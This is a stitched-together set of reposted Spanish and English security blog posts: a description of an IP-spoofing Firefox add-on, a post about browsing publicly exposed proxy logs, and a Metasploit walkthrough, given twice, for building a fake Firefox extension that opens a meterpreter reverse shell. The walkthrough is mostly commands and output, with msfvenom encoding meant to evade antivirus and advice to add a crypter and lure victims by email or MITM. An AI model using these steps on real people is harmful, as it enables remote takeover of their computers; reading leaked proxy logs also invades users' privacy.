IPFlood – Simple Firefox Add-on To Hide Your IP Address

IPFlood (previously IPFuck) is a Firefox add-on created to simulate the use of a proxy. It doesn’t actually change your IP address (obviously) and it doesn’t connect to a proxy either, it just changes the headers (that it can) so it appears to any web servers or software sniffing – that you are in fact using a proxy.

This add-on is a “proof of concept” to show anyone who isn’t already aware that IP address has become obsolete and that no one should use an IP address as an evidence any more. This plug-in is just one of many ways to spoof an IP address and these spoofing could lead to outrageous accusation of innocents.

How does it work?

You can imagine that if I could just overwrite any existing information about your IP address I would have done so (or somebody else would have a while back ago)…
But it’s actually a little more tricky : when sending a request to a server you will provide several information about your IP address : three of them come from the Application Layer and the last one comes from the Transport Layer. This last one I can’t modify : you wouldn’t get the answer to your request if that was done. But the three others can be overwritten without any consequence to your browsing…
These three headers were created to provide information on the real IP of a person surfing through a proxy server. So when you enable IPFuck, the websites you are visiting will believe that your real IP is a proxy server and (if the website was done correctly) focus on the false IP you are sending…
A lot of websites try and figure out who is hiding behind a proxy server. And if you don’t believe me (I won’t mind), just check out this Google search request : get real ip address php. Most of the snipplets given here will check HTTP headers (the one we overwrite) before the Transport Layer information (‘REMOTE_ADDR’).

You can install IPFlood (previously IPFuck) for Firefox here:
ipflood-1.2.1-fx.xpi
Or read more here.

Fuentes:
http://www.darknet.org.uk/2014/10/ipflood-simple-firefox-add-hide-ip-address/
https://www.buzztouch.com/applications020113/JA56066181BD8600604F8D687/documents/customHTML_865B3EC611A4B962DBD85DF.html
http://amathelegend.wordpress.com/2011/08/13/ip-flood-firefox-add-ons/

De ver una petición HTTP a acabar leyendo logs de proxys

¡Saludos!

  Me hallaba yo traqueteando un poco con un servidor local, diseñando una pequeña prueba de concepto para un paper que estoy escribiendo cuando una cabecera HTTP salvaje se me cruzó. Echando un ojo a las cabeceras que se enviaban con Live HTTP Headers aparecía una hacia localhost, hacia un puerto raruno. Los que ya me conocen saben de mi extrema paranoia, asi que en esos momentos lo primero que pensé es que algunos rusos estarían practicando el medievo con mi ordenata.

 

   Asi que tiré de google para ver si alguien sabía qué diablos era aquello, y... encontré algo bastante interesante. En el primer enlace explicaban que se trataba de Avast y de la protección web, pero eso ya no era lo que me intrigaba. En la busqueda "localhost 27275" me saltaron webs, todas similares, en gran cantidad (o como diría un amigo: "a tutiplen"). Pasado el susto, y ya tranquilo, leí los title y pensé... "¿Squid?" "¿Report?" nah... no creo que sea... ¿logs de proxys? ¿Ips, usuarios, sitios visitados? Demasiado bueno para ser cierto... Habrá que echar un vistazo...  Premio :)


     

   Sí, era lo que pensaba. El dueño de la IP que aparece también usa Avast!, mira qué guay. Lógicamente empecé a trastear un poco, a ver qué se podía ver por los logs.Se acaban viendo cosas curiosas, como descargas de peliculas taiwanesas, FTPs de acceso anónimo, fotos de gente, etc. Como gran hermano, pero versión asiática.

    Independientemente del cotilleo, hay cosas más interesantes que se muestran desde el punto de vista de la seguridad, como los usuarios e IPs:

     
   Así como qué webs suelen visitar, o qué software tienen para realizar un ataque dirigido, ya que las descargas de actualizaciones (y los instaladores) quedan reflejados, como en este ejemplo de la Universidad de Buenos Aires:

La conclusión lógica de esto es que dejar algo tan jugoso como los logs de del proxy de tu empresa/universidad/otra-cosa al acceso de cualquiera es algo que ya debería de estar más que superado.

Byt3z
http://0verl0ad.blogspot.com

Cómo comprometer un equipo mediante una extensión de Firefox falsa (xpi)

La siguiente técnica recuerda a la de los applet falsos de java y su funcionamiento es similar: mediante ingeniería social intentaremos que un usuario instale una extensión de Firefox falsa para obtener una sesión remota en su sistema.

A través del módulo de Metasploit firefox_xpi_bootstrapped_addon, crearemos un fichero .xpi que será presentado a la víctima dentro de una página web. Cuando el usuario la visite, su navegador Firefox le preguntará si confía y desea instalar la extensión. Si el usuario hace clic en 'instalar' se ejecutará el payload con los permisos del usuario.

Haremos una simple demostración contra un Windows XP SP3.

1. Primero abrimos la consola de metasploit (msfconsole), actualizamos y cargamos el módulo correspondiente:

msf > use exploit/multi/browser/firefox_xpi_bootstrapped_addon
msf  exploit(firefox_xpi_bootstrapped_addon) >

2. Ahora procedemos a configurar el addon:

msf  exploit(firefox_xpi_bootstrapped_addon) > set addonname falso
addonname => falso
msf  exploit(firefox_xpi_bootstrapped_addon) > set SRVHOST 192.168.1.35
SRVHOST => 192.168.1.35
msf  exploit(firefox_xpi_bootstrapped_addon) > set SRVPORT 80
SRVPORT => 80
msf  exploit(firefox_xpi_bootstrapped_addon) > set URIPATH fakeEx
URIPATH => fakeEx
msf  exploit(firefox_xpi_bootstrapped_addon) > set LHOST 192.168.1.35
LHOST => 192.168.1.35

3. A continuación preparamos nuestro payload para intentar que el AV no lo detecte. Primero con msfvenom:

D:\metasploit4>ruby\bin\ruby.exe msf3\msfvenom --payload windows/meterpreter/reverse_tcp --format exe --encoder x86/shikata_ga_nai --iterations 10 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f c LHOST=192.168.1.35 > trojan.exe
[*] x86/jmp_call_additive succeeded with size 321 (iteration=1)
[*] x86/jmp_call_additive succeeded with size 353 (iteration=2)
[*] x86/jmp_call_additive succeeded with size 385 (iteration=3)
[*] x86/jmp_call_additive succeeded with size 417 (iteration=4)
[*] x86/jmp_call_additive succeeded with size 449 (iteration=5)

Luego tendréis que utilizar también otro crypter si queréis que vuestro payload sea lo más FuD posible... así que no cuesta nada modificar un stub y utilizar alguno de esos tan sexys que hay en la Red ;)

Después cargamos el payload para nuestro módulo:

msf  exploit(firefox_xpi_bootstrapped_addon) > set PAYLOADFILE d:\\metasploit4\\trojan.exe
PAYLOADFILE => d:\metasploit4\trojan.exe
payload => windows/meterpreter/reverse_tcp

Y lanzamos el exploit:

msf  exploit(firefox_xpi_bootstrapped_addon) > exploit
[*] Exploit running as background job.
msf  exploit(firefox_xpi_bootstrapped_addon) >
[*] Started reverse handler on 192.168.1.35:4444
[*] Using URL: http://192.168.1.35:80/fakeEx
[*] Server started.

4. Ahora que tenemos todo funcionando sólo necesitamos que el usuario visite nuestra URL (correo, MITM, DNS, ...) y que instale la extensión falsa de Firefox:

msf  exploit(firefox_xpi_bootstrapped_addon) >
[*] 192.168.1.35     firefox_xpi_bootstrapped_addon - Sending xpi and waiting for user to click 'accept'...

Si cae en la trampa, obtendremos la sesión remota:

[*] Sending stage (752128 bytes) to 192.168.1.35
[*] Meterpreter session 1 opened (192.168.1.35:4444 -> 192.168.1.35:15831) at 2012-05-28 19:11:57 +0200

msf  exploit(firefox_xpi_bootstrapped_addon) > sessions -i

Active sessions
===============

  Id  Type                   Information  Connection
  --  ----                   -----------  ----------
  1   meterpreter x86/win32               192.168.1.35:4444 -> 192.168.1.35:15831 (192.168.1.35)

FUENTE:http://www.hackplayers.com/2012/05/hackear-un-equipo-mediante-una.html

Comprometiendo un equipo mediante una extension de Firefox falsa

Mediante ingeniería social intentaremos que un usuario instale una extensión de Firefox falsa para obtener una sesión remota en su sistema.

A través del módulo de Metasploit firefox_xpi_bootstrapped_addon, crearemos un fichero .xpi que será presentado a la víctima dentro de una página web. Cuando el usuario la visite, su navegador Firefox le preguntará si confía y desea instalar la extensión. Si el usuario hace clic en 'instalar' se ejecutará el payload con los permisos del usuario.

Haremos una simple demostración contra un Windows XP SP3.

1. Primero abrimos la consola de metasploit (msfconsole), actualizamos y cargamos el módulo correspondiente:

msf > use exploit/multi/browser/firefox_xpi_bootstrapped_addon
msf  exploit(firefox_xpi_bootstrapped_addon) >

2. Ahora procedemos a configurar el addon:

msf  exploit(firefox_xpi_bootstrapped_addon) > set addonname falso
addonname => falso
msf  exploit(firefox_xpi_bootstrapped_addon) > set SRVHOST 192.168.1.35
SRVHOST => 192.168.1.35
msf  exploit(firefox_xpi_bootstrapped_addon) > set SRVPORT 80
SRVPORT => 80
msf  exploit(firefox_xpi_bootstrapped_addon) > set URIPATH fakeEx
URIPATH => fakeEx
msf  exploit(firefox_xpi_bootstrapped_addon) > set LHOST 192.168.1.35
LHOST => 192.168.1.35

3. A continuación preparamos nuestro payload para intentar que el AV no lo detecte. Primero con msfvenom:

D:\metasploit4>ruby\bin\ruby.exe msf3\msfvenom --payload windows/meterpreter/reverse_tcp --format exe --encoder x86/shikata_ga_nai --iterations 10 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f c LHOST=192.168.1.35 > trojan.exe
[*] x86/jmp_call_additive succeeded with size 321 (iteration=1)
[*] x86/jmp_call_additive succeeded with size 353 (iteration=2)
[*] x86/jmp_call_additive succeeded with size 385 (iteration=3)
[*] x86/jmp_call_additive succeeded with size 417 (iteration=4)
[*] x86/jmp_call_additive succeeded with size 449 (iteration=5)

Luego tendréis que utilizar también otro crypter si queréis que vuestro payload sea lo más FuD posible... así que no cuesta nada modificar un stub y utilizar alguno de esos tan sexys que hay en la Red

Después cargamos el payload para nuestro módulo:

msf  exploit(firefox_xpi_bootstrapped_addon) > set PAYLOADFILE d:\\metasploit4\\trojan.exe
PAYLOADFILE => d:\metasploit4\trojan.exe
payload => windows/meterpreter/reverse_tcp

Y lanzamos el exploit:

msf  exploit(firefox_xpi_bootstrapped_addon) > exploit
[*] Exploit running as background job.
msf  exploit(firefox_xpi_bootstrapped_addon) >
[*] Started reverse handler on 192.168.1.35:4444
[*] Using URL: http://192.168.1.35:80/fakeEx
[*] Server started.

4. Ahora que tenemos todo funcionando sólo necesitamos que el usuario visite nuestra URL (correo, MITM, DNS, ...) y que instale la extensión falsa de Firefox:

msf  exploit(firefox_xpi_bootstrapped_addon) >
[*] 192.168.1.35     firefox_xpi_bootstrapped_addon - Sending xpi and waiting for user to click 'accept'...

Si cae en la trampa, obtendremos la sesión remota:

[*] Sending stage (752128 bytes) to 192.168.1.35
[*] Meterpreter session 1 opened (192.168.1.35:4444 -> 192.168.1.35:15831) at 2012-05-28 19:11:57 +0200

msf  exploit(firefox_xpi_bootstrapped_addon) > sessions -i

Active sessions
===============

  Id  Type                   Information  Connection
  --  ----                   -----------  ----------
  1   meterpreter x86/win32               192.168.1.35:4444 -> 192.168.1.35:15831 (192.168.1.35)

Fuente:

http://underc0de.org/foro/hacking-basico/comprometiendo-un-equipo-mediante-una-extension-de-firefox-falsa/